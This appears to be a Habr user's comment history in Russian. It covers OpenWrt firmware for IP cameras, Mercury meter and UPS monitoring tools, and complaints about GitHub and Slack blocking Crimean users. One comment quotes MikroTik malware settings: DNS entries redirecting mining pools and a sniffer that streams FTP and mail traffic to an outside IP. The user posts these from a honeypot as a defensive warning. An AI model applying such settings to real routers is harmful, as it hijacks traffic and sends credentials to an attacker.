• Гитхаб начал блокировать репозитории пользователей из Крыма, Кубы, Ирана, Северной Кореи и Сирии
    +3
    Поясню свою позицию минусаторам, которая уже озвучивалась выше.
    Компания Skrill, с которой я работал при Украине, при вводе санкций красиво написала, что так мол и так, в дальше не можете пользоваться нашим сервисом и у вас есть 24 часа на решение вопросов. Я слил жалкие 150 долларов со счёта и убрал реквизиты этой компании со своих страниц. Всё прошло чётко, красиво, с взаимным уважением. Мне до одного места в данном конкретном случае политическая составляющая и мотивация компании, я знаю только одно, что GitHub поступил по свински. Предупреди он на 24/48 часов заранее, дай время слить что нужно — он бы имел больше респекта, чем сейчас негатива, выливаемого на него. Все публичные сервисы, ведущие себя подобным образом — отстойное гуано, в разы более смердящие чем любой из мнимых или действительных диктаторских режимов.

    GitHub — shit and sucks,
    как и Slack и куча других сервисов, блокирующие аналогичным моментальным способом.

    P.S. Вангую, что следующим, кто может провернуть такое-же дерьмо, может стать Google
  • Гитхаб начал блокировать репозитории пользователей из Крыма, Кубы, Ирана, Северной Кореи и Сирии
    +1
    Привет, коллега и земляк!

    Вот и мой аккаунт мудаки-злодеи заокеанские заблокировали.
    Вычисляют по внешним IP региональных провайдеров.
    Есть смысл писать этим бакланам в предлагаемой форме-заявке или это до лампочки?

  • Алгоритмы эффективности: обзор камер видеонаблюдения Nobelic 2019
    0
    Спасибо.
    SDK на эти процы не найти, а то что есть в сети — старый шлак.
  • Алгоритмы эффективности: обзор камер видеонаблюдения Nobelic 2019
    0
    Наш проект это OpenIPC, там есть ссылки на каналы, исходники, SDK и прочее.
    Проект в стадии активного развития, но уже вполне работоспособен на некоторых устройствах и главное что у нас есть — единомышленники, люди, умеющие работать с кодом и железом.
  • Алгоритмы эффективности: обзор камер видеонаблюдения Nobelic 2019
    0
    Добрый день

    Если есть возможность, напишите пожалуйста какой используете процессор в своих камерах и какую матрицу ибо не нашел ни в статье ни в технических описаниях к камерам. Спасибо.

    Интерес не праздный ибо пилим потихоньку как штатные прошивки с модификациями так и OpenWrt версию под HiSilicon SoC's, собираем информацию по различным прошивкам, обмениваемся опытом, ремонтируем устройства (есть вспомогательное ПО), имеем канал в Телеграм, и т.д…
  • Металлопоиск и… нейросеть
    +1
    Интересная статья, спасибо!
    Скажите, а выполнялся-ли практический поиск на местности и если да, то какие предметы были найдены?
    Пару фото самого металлоискателя и найденных артефактов (монеты, пуговицы гвозди и т.д.) конце статьи приятно-бы дополнили и без того хороший материал.
  • Slack банит аккаунты из Крыма
    +3
    А Баба-яга против — Crimea Internet Boycott

    Пару часов назад получил сообщение о блокировке двух своих акаунтов Slack. Увидел эту статью, но в комментариях вместо технических дискуссий, слишком много политики, ИМХО.

    Последний раз в Slack я заходил месяца два назад на одном акаунте и месяцев шесть назад на другом. VPN для повседневного сёрфа не использую, потому все заходы были напрямую с ПК через провайдера Farline.

    Думаю что Slack решил забанить те акаунты, у которых в логах мелькали адреса спорных и проблемных территорий. В итоге шлюз между Slack, Telegram и IRC нашего проекта wifi-iot.com перевели на токен другого админа, а для себя я решил пока сидеть в группе через Telegram. IRC и XMPP мы рассматриваем как последний рубеж, про запас.

    В январе 2015 года я пытался собирать статьи и ссылки на сервисы, которые один за одним закрывали доступ мне, рядовому жителю Крыма, в единую заметку, так понимаю пришло время дописать и подровнять список ;)

    Всем бобра!

    P.S. Претензий к пославшим меня нах фирмам и сервисам не имею, политические вопросы не обсуждаю, к происходящему отношусь как анархист-максималист, знающий и помнящий что «скоро всё ё… я, не успеем опомнится...», но теперь уже в глобальных масштабах всей планеты ;)

    P.P.S. Перечитав свой комментарий, вспомнив былое, пересмотрев свою заметку указанную выше, начал составлять план, что-же мне там такого отметить и подправить. Среди сервисов которыми я пользовался (и пользуюсь), увидел LinkedIn, который блокирует Роскомнадзор и без VPN на него не попасть. И тут меня осенила, интересная идея — неплохо было-бы найти какой-то ресурс или, что лучше, ресурсы, которые были-бы заблокированы для спорных и проблемных территорий с одной стороны и в это-же время, были-бы заблокированы Роскомнадзором с другой стороны. Это было-бы интересно выделить отобразить, эдакая вишенка на торте так сказать ;)

  • Пишем протоколы счетчиков Меркурий 230 и Меркурий 200 для OpenSCADA
    0
    Конечно. Я на Debian отлаживаю.
  • Записки IoT-провайдера. Зоопарк приборов учета
    0
    Осмелюсь предложить свою самоделку для Меркурий 206 под OpenWrt (JSON для Zabbix умеет) — GitHub. Подборка некоторых ссылок и недописанные мои заметки здесь — ZFT Lab.
    Фидбек, тесты и правки приветствуются. Спасибо!
  • Пишем протоколы счетчиков Меркурий 230 и Меркурий 200 для OpenSCADA
    0
    Осмелюсь предложить свою самоделку для Меркурий 206 под OpenWrt (JSON для Zabbix умеет) — GitHub. Подборка некоторых ссылок и недописанные мои заметки здесь — ZFT Lab.
    Фидбек, тесты и правки приветствуются. Спасибо!
  • Пишем протоколы счетчиков Меркурий 230 и Меркурий 200 для OpenSCADA
    0
    Системы не использую, планов пока нет.
  • Получаем данные со счетчиков Меркурий 203.2Т по RS-485
    +1
    Осмелюсь предложить свою самоделку для Меркурий 206 под OpenWrt (JSON для Zabbix умеет) — GitHub. Подборка некоторых ссылок и недописанные мои заметки здесь — ZFT Lab.
    Фидбек, тесты и правки приветствуются. Спасибо!
  • Обзор и устройство современных счётчиков электроэнергии
    0
    Осмелюсь предложить свою самоделку для Меркурий 206 под OpenWrt (JSON для Zabbix умеет) — GitHub. Подборка некоторых ссылок и недописанные мои заметки здесь — ZFT Lab.
    Фидбек, тесты и правки приветствуются. Спасибо!
  • Zabbix 3.4: Массовый сбор данных на примерах счетчика Меркурий и smartmontools
    0
    Осмелюсь предложить свою самоделку для Меркурий 206 под OpenWrt (JSON для Zabbix умеет) — GitHub
    Подборка некоторых ссылок и недописанные мои заметки здесь — ZFT Lab.
    Фидбек, тесты и правки приветствуются. Спасибо!
  • Zabbix 3.4: Массовый сбор данных на примерах счетчика Меркурий и smartmontools
    +1
    Осмелюсь предложить свой вариант реализации мониторинга UPS, работающих по протоколу Megatec (тоже JSON+Zabbix). Информацию собирал для себя, в основном столкнувшись с необходимостью контроля за UPS Энергия ПН-500 (и других этого производителя). Был взят исходник из статьи, допилен коллегой по моей просьбе, протестирован и опубликован в виде пакета для сборки в OpenWrt на GitHub. Получившийся бинарник (~5kB) легко закидывается в любое OpenWrt устройство с Zabbix агентом, без необходимости пересборки системы. Как по мне, то NUT немного «жирноват» для Embedded устройств с такими целями как получение данных с UPS с последующей передачей их в Zabbix.
  • Колхозим мониторинг ИБП с протоколом Megatec в Zabbix
    0
    Осмелюсь предложить свой вариант реализации мониторинга UPS, работающих по протоколу Megatec. Информацию собирал для себя, в основном столкнувшись с необходимостью контроля за UPS Энергия ПН-500 (и других этого производителя). Был взят исходник из статьи, допилен коллегой по моей просьбе, протестирован и опубликован в виде пакета для сборки в OpenWrt на GitHub. Получившийся бинарник (~5kB) легко закидывается в любое OpenWrt устройство без необходимости пересборки системы. Как по мне, то NUT немного «жирноват» для таких целей как получение данных с UPS с последующей передачей их в Zabbix/Nagios. Работа Zabbix и JSON прекрасно описаны в статье на Хабре. Если кого-то заинтересовала утилита для электросчётчиков Меркурий, у нас она то-же есть для OpenWrt.
  • Как мы сделали малогабаритный облачный видеорегистратор из обычной IP камеры
    0
    Несколько лет назад LEDE отпочковался от OpenWRT, привёл в порядок свою структуру и архитектуру, написал определенные правила, а вот сейчас они опять вместе объединяются в текущем транке.
    Да, используя транк, а не законченный релиз можно получить приключений себе на одно место, тут я полностью согласен. Просто как по мне, больше привычен именно чистый OpenWrt, допустим Chaos Calmer релиз, баги там уже все изучены, наработки сделаны, потому и спросил с чем был связан выбор LEDE.
    А вообще, при ведении таких вот паблик проектов как у Вас, было-бы шикарно использовать сборки с применением ImageBuilder под распространённые железки. Не панацея, но примерно вот так, как товарищ один сделал для разрабатываемых им плюшек под APRS — на выходе прошивки под разные поддерживаемые им железки.
  • Как мы сделали малогабаритный облачный видеорегистратор из обычной IP камеры
    +1
    Мы к встроенному выводу Alarm Input цепляем датчик движения обычный ИК, и по нему уже идет отработка события (слушаем alarm сигнализацию от камеры) и отправка снапшотов в телеграм, яндекс, mqtt и т.д.
  • Как мы сделали малогабаритный облачный видеорегистратор из обычной IP камеры
    0
    У меня нет «стабильных поставок», я ничего не продаю. Мне присылают (прошу всегда всех, у кого есть возможность — присылайте) нерабочие платы, лагающие платы и кое-какие демо-образцы несколько дружественных фирм, которые занимаются отвёрточной сборкой камер из китайских комплектующих. Пытаюсь делать конфету из того что в лапы попадает. так сказать…
    Варианты SDK лежат на Яндекс.Диск у меня, ссылка в статье есть.Платы на HI3518xx требуют доработки приличной, чем и занимаемся в группе Телеграм (кстати, не забудьте заглянуть к нам), как самые массовые и дешевые, продающиеся под разными брендами.
    А вот платы на T20 процессоре, там уже интереснее, в них нормальны v4l есть, и следовательно, нет никаких проблем даже без OpenRTSP получить ролик и выкинуть на Яндекс.Диск или еще куда-то. Даже разработанная Вами плата роутера будет не нужна, только как бекап с аккумулятором, что само по себе — отличная идея, и Вам РЕСПЕКТ!
  • Как мы сделали малогабаритный облачный видеорегистратор из обычной IP камеры
    0
    Супервизор это трёхлапая микросхемка, лечит зависоны на ура у этой (и не только) железки. Вот актуальное описание на 4PDA нашел, сразу два в одном, описаны две болезни и как лечить — про порты и про супервизор.

    Но порты можно и из конфига потушить, без патча исходников, работает в таком случае (с потушенными портами) железка намного стабильнее, вот мой вариант кусочка конфига по свичу:
    config switch_vlan
    	option device 'switch0'
    	option vlan '1'
    	option ports '0 6t'
    
    config switch_port 'port1'
    	option device 'switch0'
    	option port '1'
    	option disable '1'
    
    config switch_port 'port2'
    	option device 'switch0'
    	option port '2'
    	option disable '1'
    
    config switch_port 'port3'
    	option device 'switch0'
    	option port '3'
    	option disable '1'
    
    config switch_port 'port4'
    	option device 'switch0'
    	option port '4'
    	option disable '1'
    
    config switch_port 'port5'
    	option device 'switch0'
    	option port '5'
    	option disable '1'
    
  • Как мы сделали малогабаритный облачный видеорегистратор из обычной IP камеры
    0
    Еще по железу немного.
    Прочитал фразу «На HAME A5 наша прошивка регистратора работала нестабильно, роутер постоянно зависал и перезагружался. Скорее всего это происходило из-за сильного перегрева. Поэтому пришлось от него отказаться в пользу более надёжного и проверенного варианта.»

    Там нужно на этом роутере супервизор питания ставить и отключать неиспользуемые ETH порты — из-за этого он сильно очень греется. Отключение портов возможно как при сборке прошивки в исходниках, так и через конфиг в секции свича. И будет этот роутер работать. после данных модификаций, как трактор, т.е. без проблем.
  • Как мы сделали малогабаритный облачный видеорегистратор из обычной IP камеры
    +1
    Спасибо за интересный материал, есть над чем подумать. И сразу несколько вопросов:
    Чем был обусловлен выбор LEDE, а не OpenWrt и не их последний совместный транк?
    Не думали-ли всё-таки попробовать уйти от разработанной вами доп.платы и поднять LEDE/OpenWrt сразу на камере? Ваши аргументы выше по поводу «сегодня есть, а завтра уже нет» я читал и с ними согласен на 99%. Однако если сделать полностью програмное решение, с возможностью выгрузки в локальное облако, это было-бы шикарно. Для старта есть смысл поддерживать пока только железки на процессорах HI35xx и T10/T20, как самые распространённые, IMHO. У нас уже есть небольшой коллектив, копаем в этом направлении, как по модификации китайского ПО, так и по тестовым сборкам OpenWrt (там есть ссылки на тематические чаты в Telegram и код на GitHub). Присоединяйтесь, будем рады!
  • Обзор и устройство современных счётчиков электроэнергии
    0
    Спасибо за статью.

    Вот от меня в копилку общих знаний миниатюрная (14кБ) утилита для съёма показаний для счётчиков Меркурий по RS485 порту. Пригодится «самоделкиным» и «кулибиным», умеющим собирать пакеты для OpenWrt/LEDE…
  • Новая уязвимость Mikrotik? Нет, но стоит проверить свои устройства
    0
    Очистка DNS записей:
    /ip dns static remove [find where address=185.206.144.149]
  • Новая уязвимость Mikrotik? Нет, но стоит проверить свои устройства
    0
    Эта гадость, помимо вышеперечисленного, стала в последнее время добавлять еще много (50-80) записей в DNS на Микротике и включать снифер.

    #
    /ip dns static
    add address=185.206.144.149 name=asia1.ethermine.org
    add address=185.206.144.149 name=asia1.ethpool.org
    add address=185.206.144.149 name=asia1.fullhashed.com
    add address=....
    #
    /tool sniffer
    set file-limit=100KiB filter-interface=all filter-ip-protocol=tcp,udp \
        filter-port=ftp-data,ftp,pop3,143,1500,10000 filter-stream=yes \
        streaming-enabled=yes streaming-server=37.1.207.114
    #
    


    Для уничтожения врага (а в данном случае для недопущения заражения и для выполнения полноценного сканирования устройств в сети) нужно его изучать. У меня специально стоит один подопытный кролик, на котором они упражняются, а мне приходят логи изменений, какие новые гадости добавляют эти мерзавцы…
  • WireGuard «придет» в ядро Linux — почему?
    +1
    Поддержу, друг!
    У меня более восьми тысяч инсталляций на различных устройствах с 2003 года.
    Единственное решение, тупое как пробка (в хорошем смысле слова ибо ничего лишнего), с достаточным функционалом и безотказно работающее на любом железе.
  • Получаем данные со счетчиков Меркурий 203.2Т по RS-485
    0
    Вот мой вариант со сборкой в среде OpenWrt
  • Как мы научились подключать китайские камеры за 1000р к облаку. Без регистраторов и SMS (и сэкономили миллионы долларов)
    0
    Забыл сказать, что есть еще у XM линейка плат на процессоре XM510 (перемаркированный Mozart), тоже «огрызки», но тем не менее работают на Linux.
  • Как мы научились подключать китайские камеры за 1000р к облаку. Без регистраторов и SMS (и сэкономили миллионы долларов)
    0
    GM8136 SDK тот что на Github или у вас от вендора что-то было?
    Да, из-за единичной модели нет смысла связываться, Hisilicon в этом плане на коне конечно, кто только не штампует платы на их процессорах.
  • Как мы научились подключать китайские камеры за 1000р к облаку. Без регистраторов и SMS (и сэкономили миллионы долларов)
    0
    А платы на каких процессорах рекомендуете посмотреть?
    Из GrainMedia знаю и имею только GM8136S, с Fullhan дела не имел.
  • Как мы научились подключать китайские камеры за 1000р к облаку. Без регистраторов и SMS (и сэкономили миллионы долларов)
    0
    DDR у этого чипа всего 32M, что достаточно мало по сегодняшним меркам. Очередной китайский «огрызок», к сожалению.
  • Как мы научились подключать китайские камеры за 1000р к облаку. Без регистраторов и SMS (и сэкономили миллионы долларов)
    0
    Мне удалось на этой железке, за неспешной вечерней беседой с iTuneDVR, загрузить по TFTP и запустить свою сборку OpenWrt для HI3518EV200, используя родной U-Boot загрузчик, идущий к HuaweiLite OS. Работает сеть, WEB-интерфейс ну и прочие стандартные компоненты, модель процессора пока не правил (надо будет еще свой загрузчик потестировать), видео пока еще в разработке ;)

    image
  • Как мы научились подключать китайские камеры за 1000р к облаку. Без регистраторов и SMS (и сэкономили миллионы долларов)
    0
    У вас есть загрузчик и ядро для 3518EV201 процессора?
    То, что для v200 не подходит (ни загрузчик, ни ядро).
  • Как мы научились подключать китайские камеры за 1000р к облаку. Без регистраторов и SMS (и сэкономили миллионы долларов)
    0
    Ну никак.
    Это простейшая бюджетная плата JVT-S130.
    Это я к тому, что потенциально надо быть готовым к таким вот фортелям фортуны.
    Хотя вам тут и карты в руки как раз — накатить вашу OS можно попробовать.
  • Как мы научились подключать китайские камеры за 1000р к облаку. Без регистраторов и SMS (и сэкономили миллионы долларов)
    0
    Код этой штучки есть на GitHub.
  • Как мы научились подключать китайские камеры за 1000р к облаку. Без регистраторов и SMS (и сэкономили миллионы долларов)
    0
    Вчера получил несколько плат камер для экспериментов.
    Процессор HI3518EV200, сенсор Aptina AR0130, а внутри — не Linux

    System startup

    U-Boot 2010.06 (Mar 28 2016 — 09:55:50)

    Check Flash Memory Controller v100… Found
    SPI Nor(cs 0) ID: 0xc2 0x20 0x17
    Block:64KB Chip:8MB Name:«MX25L6406E»
    SPI Nor total size: 8MB
    SPI Nand ID Table Version 1.4
    MMC:
    EMMC/MMC/SD controller initialization.
    Card did not respond to voltage select!
    No EMMC/MMC/SD device found!
    *** Warning — bad CRC, using default environment

    In: serial
    Out: serial
    Err: serial
    *No SD card found!
    No mmc storage device found!
    Hit any key to stop autoboot: 0
    8192 KiB hi_fmc at 0:0 is now current device

    ## Starting application at 0x80008000…
    ********hello HuaweiLite OS ARM926********

    version: HuaweiLite OS KernelV100R002C00B013
    open-version: HuaweiLite OS 1.1.1RC
    build data: Mar 11 2016 09:45:30

    **********************************
    losAppInit
    porc fs init…
    Mount procfs finished.
    random init…
    uart init…
    shell init…

    HuaweiLite OS # <= та-дам!
  • Как мы научились подключать китайские камеры за 1000р к облаку. Без регистраторов и SMS (и сэкономили миллионы долларов)
    0
    Если речь про моддинг — расширение функционала, который детально описан по ссылке выше. Там-же указана и группа в телеграме, в которой присутствуют как разработчики и сотрудники различных сервисов, гуру кодинга и embedded реверс-инжиниринга так и просто интересующиеся. Обмен опытом, поиск неисправностей и багов, обсуждение интересных програмных и аппаратных решений. А в параллельной ветке все наработки постепенно переводятся на OpenWrt рельсы.
  • Как мы научились подключать китайские камеры за 1000р к облаку. Без регистраторов и SMS (и сэкономили миллионы долларов)
    0
    Там не только ipeye и vtund, там есть mqtt, ssh/scp, ftp, curl, телеметрия и куча других мелких но полезных фишек интегрировано. Ссылка выше в комменте была моём про ipeye, если не увидели — слово «моддинг».
    Вариантов облачных наблюдений сейчас уже мешочек разных на самом деле. Просто ipeye своим маленьким демоном гармонично вписался в подборку нашего проекта, а основная суть моего рассказа была в том, что его можно запустить даже не меняя родную прошивку на камере, вот и всё. Если есть возможность сменить прошивку — естественно, все эти разработки становятся ненужны автоматически.
  • Как мы научились подключать китайские камеры за 1000р к облаку. Без регистраторов и SMS (и сэкономили миллионы долларов)
    0
    К проекту ipeye.ru имеет отношение только одноимённый демон, а vtund никакого отношения к ним не имеет.
    Сильно язвить Вам, думаю, не стоит, так как скорее всего Вы даже не читали какие эксперименты проводятся и какие цели преследуются в этих тестовых сборках прошивок, а вот показать или рассказать присутствующим на Хабре о своих, как я понимаю более перспективных и взрослых разработках связанных с Webrtc, дело достойное не мальчика, но мужа…
  • Как мы научились подключать китайские камеры за 1000р к облаку. Без регистраторов и SMS (и сэкономили миллионы долларов)
    0
    Выполните ps в прошивке, он сразу запущен и на виду.